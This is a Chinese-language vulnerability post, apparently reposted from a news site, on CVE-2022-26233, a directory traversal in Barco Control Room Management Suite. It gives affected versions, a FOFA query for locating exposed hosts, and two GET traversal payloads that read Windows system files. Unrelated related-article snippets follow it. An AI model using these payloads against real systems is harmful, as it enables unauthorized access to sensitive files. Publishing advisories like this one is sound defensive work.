Barco Control Room Management Suite - 目录遍历(CVE-2022-26233)

news/2024/11/8 14:43:18/

一、漏洞描述

通过 Suite 2.9 Build 0275 进行的巴可控制室管理被发现容易受到目录遍历的影响,从而允许攻击者访问敏感信息和组件。请求必须以“GET /..\..”字符串开头。

二、影响版本

Barco Control Room Management Suite <= 2.9 build 0275

三、漏洞环境

fofa:barco

四、漏洞复现

paylaod:

GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5Cwin.ini

GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts

五、更新建议

目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:

巴可公司官方网站 视觉影像专家 - Barco


http://www.ppmy.cn/news/301275.html

相关文章

电力系统故障造成科视CP2210辅助电源损坏

我们县一家3D影院用科视CP2210放映机&#xff0c;加电无反应&#xff0c;据工作人员反应&#xff0c;前段时间电力故障造成电压不稳&#xff0c;造成出票打印机电源烧坏&#xff0c;但是当时放映机工作正常&#xff0c;所以也没在意&#xff0c;经过近一个月的使用&#xff0c;…

USB Server应用于RPA机器人案例分析

USB Server应用于RPA机器人案例分析 在技术更迭日新月异的今天&#xff0c;以机器人为代表的人工智能正在广泛应用于企业的业务流程中&#xff0c;RPA软件“机器人”就是一个例子。 RPA机器人就像一个虚拟员工&#xff0c;可以捕捉并模拟我们日常的键盘、鼠标操作等人机交互行…

中国电子信息制造业投资策略分析及十四五需求前景预测报告2022-2028年版

中国电子信息制造业投资策略分析及十四五需求前景预测报告2022-2028年版 m 第1章&#xff1a;中国电子信息制造业发展环境分析1.1 电子信息制造业界定 1.1.1 电子信息制造业定义 1.1.2 电子信息制造业分类 1.1.3 电子信息制造业产业链 1.2 电子信息制造业政策环境 1.2.1 …

中国电子信息制造产业运营模式及未来投资方向建议报告2022版

中国电子信息制造产业运营模式及未来投资方向建议报告2022版 ------------------------------------- 《修订日期》&#xff1a;2022年2月 《出版单位》&#xff1a;鸿晟信合研究院 《对接人员》&#xff1a;周文文 【内容分析有删减了解详情可查看咨询鸿晟信合研究院专员&…

异构平台轮询出现问题,错误代码:10912

解决方法&#xff1a; 查看日志 MAP的在sm/coship-sm/sm/log/ 根据故障发生的时间来查找相关的错误日志&#xff0c;注意查一下错误代码表&#xff0c;10912的是发给SM没回复&#xff0c;证明鉴权的过程是正常的&#xff0c;应该直接找SM的日志。 错误代码表&#xff1a; 问…

2022-2027年中国广播电视设备制造行业市场调研及未来发展趋势预测报告

【报告类型】产业研究 【报告格式】电子版、纸介版 【出品单位】华经产业研究院 本报告由华经产业研究院出品&#xff0c;对中国广播电视设备制造行业的发展现状、竞争格局及市场供需形势进行了具体分析&#xff0c;并从行业的政策环境、经济环境、社会环境及技术环境等方面…

美团面试全流程详解(一面 + 二面)

叮。。。。。美团来电。这次不是外卖而是电话面试。 所报岗位为后端 / 服务端开发&#xff0c;但是从我的复盘来看&#xff0c;这和 Java 后端开发的内容差不多&#xff0c;除了部分的语言特性外&#xff0c;还是四大件基础知识为重&#xff1b; 下面我们来看看都问了啥&…

python 属性访问器 (property)

文章目录 python 属性访问器 (property)使用 property() 内置函数创建在类定义中使用特殊方法创建__get__ 和 __set__ python 属性访问器 (property) Python 中的属性访问器是 property 类型&#xff0c;提供了一种跟属性值相关的函数&#xff08;getter、setter、deleter&…